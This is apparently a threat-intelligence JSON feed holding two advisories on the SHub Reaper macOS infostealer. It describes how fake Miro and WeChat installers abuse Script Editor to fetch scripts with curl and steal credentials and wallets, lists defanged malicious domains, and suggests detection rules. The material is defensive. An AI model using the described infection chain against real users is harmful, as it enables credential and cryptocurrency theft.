{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/miro/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["WeChat","Miro","macOS Script Editor","Google Software Update"],"_cs_severities":["high"],"_cs_tags":["macos","infostealer","backdoor","social-engineering","applescript"],"_cs_type":"advisory","_cs_vendors":["Apple","Google","Microsoft"],"content_html":"\u003cp\u003eThe SHub Reaper stealer is a macOS infostealer that blends traditional stealer functionality with persistent backdoor capabilities. It is distributed through social engineering lures such as fake WeChat and Miro installers. This malware demonstrates a shift in macOS malware behavior, moving away from ClickFix social engineering to Apple script-based execution to evade detection. SHub Reaper leverages a unique multi-brand spoofing technique, impersonating Apple, Google, and Microsoft across the infection chain. The malware installs a fake Google Update framework to maintain persistence and establishes a backdoor, allowing for arbitrary command execution and continuous compromise of the infected system. This represents an evolution in macOS infostealers, combining \u0026ldquo;smash-and-grab\u0026rdquo; data theft with long-term access and control.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attack starts with malicious web pages offering fake Miro and WeChat installers.\u003c/li\u003e\n\u003cli\u003eVictims download and execute the fake installers, initiating the infection chain.\u003c/li\u003e\n\u003cli\u003eThe malware may be hosted on a typosquatted Microsoft domain.\u003c/li\u003e\n\u003cli\u003eThe installer executes under the guise of a fake Apple security update.\u003c/li\u003e\n\u003cli\u003eSHub Reaper installs a fake Google Update framework under the user Library paths for persistence.\u003c/li\u003e\n\u003cli\u003eA LaunchAgent is registered using Google Keystone-style naming conventions to ensure the malware runs regularly.\u003c/li\u003e\n\u003cli\u003eThe malware beacons to a command and control server every 60 seconds, supporting arbitrary command execution.\u003c/li\u003e\n\u003cli\u003eThe malware steals credentials, hijacks crypto wallets, and exfiltrates documents while maintaining persistent backdoor access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful SHub Reaper infections can lead to significant data loss, including sensitive credentials, cryptocurrency assets, and confidential documents. The persistent backdoor allows attackers to maintain long-term access to compromised systems, enabling further data theft, command execution, and potential lateral movement within the network. The shift from ClickFix tactics to AppleScript execution renders traditional terminal-centric detections ineffective, increasing the risk of successful compromise. This combination of stealer and backdoor capabilities makes SHub Reaper a particularly dangerous threat to macOS users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for unexpected invocations of Script Editor (\u003ccode\u003eScript Editor.app\u003c/code\u003e) to detect potential AppleScript-based execution, as outlined by SentinelOne\u0026rsquo;s report.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule detecting \u003ccode\u003eosascript\u003c/code\u003e spawning \u003ccode\u003ecurl\u003c/code\u003e or shell interpreters to identify malicious AppleScript activity.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule for detecting browser-to-AppleScript execution chains to identify potential initial access vectors.\u003c/li\u003e\n\u003cli\u003eEducate macOS users to be wary of software installers from untrusted sources and to verify the authenticity of software updates, as this is the primary infection vector.\u003c/li\u003e\n\u003cli\u003eMonitor user Library paths for the installation of unexpected Google Update frameworks and LaunchAgents with Google Keystone-style naming conventions, as these are indicators of persistence.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-19T19:53:19Z","date_published":"2026-05-19T19:53:19Z","id":"https://feed.craftedsignal.io/briefs/2026-05-shub-reaper-macos-backdoor/","summary":"The SHub Reaper stealer combines credential theft, wallet hijacking, and document exfiltration with persistent backdoor access on macOS, distributed through fake WeChat and Miro installers while spoofing Apple, Google, and Microsoft to evade detection.","title":"SHub Reaper Stealer Backdoors macOS with Multi-Brand Spoofing","url":"https://feed.craftedsignal.io/briefs/2026-05-shub-reaper-macos-backdoor/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Chrome","Firefox","Edge","Opera","Vivaldi","Arc","Orion","WeChat","Miro","MetaMask","Phantom","1Password","Bitwarden","LastPass","Exodus","Atomic Wallet","Ledger Live","Trezor Suite","iCloud","Telegram"],"_cs_severities":["high"],"_cs_tags":["macos","infostealer","shub reaper","malware"],"_cs_type":"advisory","_cs_vendors":["Apple","Google","Mozilla","Brave","Microsoft","Opera","Vivaldi","Arc","Orion","MetaMask","Phantom","1Password","Bitwarden","LastPass","Exodus","Atomic Wallet","Ledger","Trezor"],"content_html":"\u003cp\u003eA new variant of the SHub macOS infostealer, dubbed Reaper, has emerged, employing a novel approach to bypass existing security mitigations. Unlike previous SHub campaigns that relied on tricking users into pasting commands in Terminal, Reaper leverages the \u003ccode\u003eapplescript://\u003c/code\u003e URL scheme to launch the macOS Script Editor preloaded with a malicious AppleScript. This technique circumvents Apple\u0026rsquo;s late March mitigations in macOS Tahoe 26.4, which aimed to block the execution of harmful commands pasted into the Terminal. SentinelOne researchers discovered that victims are lured by fake installers for WeChat and Miro applications hosted on domains designed to appear legitimate. The malware fingerprints the victim\u0026rsquo;s device to detect virtual machines and VPNs, and enumerates installed browser extensions for password managers and cryptocurrency wallets, sending telemetry data to the attacker via a Telegram bot.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe victim visits a malicious website impersonating WeChat or Miro.\u003c/li\u003e\n\u003cli\u003eThe website fingerprints the visitor\u0026rsquo;s device, checking for VMs/VPNs and enumerating browser extensions. This information is sent to a Telegram bot.\u003c/li\u003e\n\u003cli\u003eThe website prompts the user to download a fake installer, which then uses the \u003ccode\u003eapplescript://\u003c/code\u003e URL scheme.\u003c/li\u003e\n\u003cli\u003eClicking the URL opens the macOS Script Editor with a preloaded malicious AppleScript.\u003c/li\u003e\n\u003cli\u003eIf the user clicks \u0026ldquo;Run\u0026rdquo; in the Script Editor, the script displays a fake Apple security update message referencing XProtectRemediator.\u003c/li\u003e\n\u003cli\u003eThe script downloads a shell script using \u003ccode\u003ecurl\u003c/code\u003e and executes it silently via \u003ccode\u003ezsh\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe shell script checks for a Russian keyboard layout; if detected, the malware exits.\u003c/li\u003e\n\u003cli\u003eIf the keyboard layout is not Russian, the script retrieves and executes a malicious AppleScript with data theft routines via \u003ccode\u003eosascript\u003c/code\u003e. This script prompts the user for their macOS password, and then steals browser data, cryptocurrency wallet data, and other sensitive files. The malware establishes persistence by installing a script impersonating the Google software update and registers it using LaunchAgent, running every minute as a beacon.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful infection by the SHub Reaper infostealer results in the theft of sensitive data, including browser data from Chrome, Firefox, Edge, Opera, Vivaldi, Arc, and Orion, cryptocurrency wallet data (MetaMask, Phantom), password manager data (1Password, Bitwarden, LastPass), desktop cryptocurrency wallet application data (Exodus, Atomic Wallet, Ledger Live, Trezor Suite), iCloud account data, Telegram session data, and developer configuration files. The malware also targets files on the Desktop and Documents folders, collecting documents smaller than 2MB, or images up to 6MB (total limit 150MB). Cryptocurrency wallet applications are hijacked by replacing their core application file with a malicious version downloaded from the C2 server. This gives the attacker persistent access to the compromised machine and enables further malware deployment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for suspicious outbound network traffic after Script Editor execution, as mentioned in the overview.\u003c/li\u003e\n\u003cli\u003eMonitor for the creation of new LaunchAgents and related files in the namespace of trusted vendors to detect persistence mechanisms, as recommended by SentinelOne.\u003c/li\u003e\n\u003cli\u003eBlock access to the known malicious domains: \u003ccode\u003eqq-0732gwh22[.]com\u003c/code\u003e, \u003ccode\u003emlcrosoft[.]co[.]com\u003c/code\u003e, and \u003ccode\u003emlroweb[.]com\u003c/code\u003e at the DNS resolver based on the IOCs provided.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-18T21:42:54Z","date_published":"2026-05-18T21:42:54Z","id":"https://feed.craftedsignal.io/briefs/2026-05-shub-macos-reaper/","summary":"A new variant of the 'SHub' macOS infostealer, dubbed Reaper, uses AppleScript to display a fake security update message and install a backdoor, ultimately stealing browser data, financial documents, and cryptocurrency wallet information while bypassing Terminal-based mitigations in macOS.","title":"SHub macOS Infostealer Variant 'Reaper' Spoofing Apple Security Updates","url":"https://feed.craftedsignal.io/briefs/2026-05-shub-macos-reaper/"}],"language":"en","title":"CraftedSignal Threat Feed — Miro","version":"https://jsonfeed.org/version/1.1"}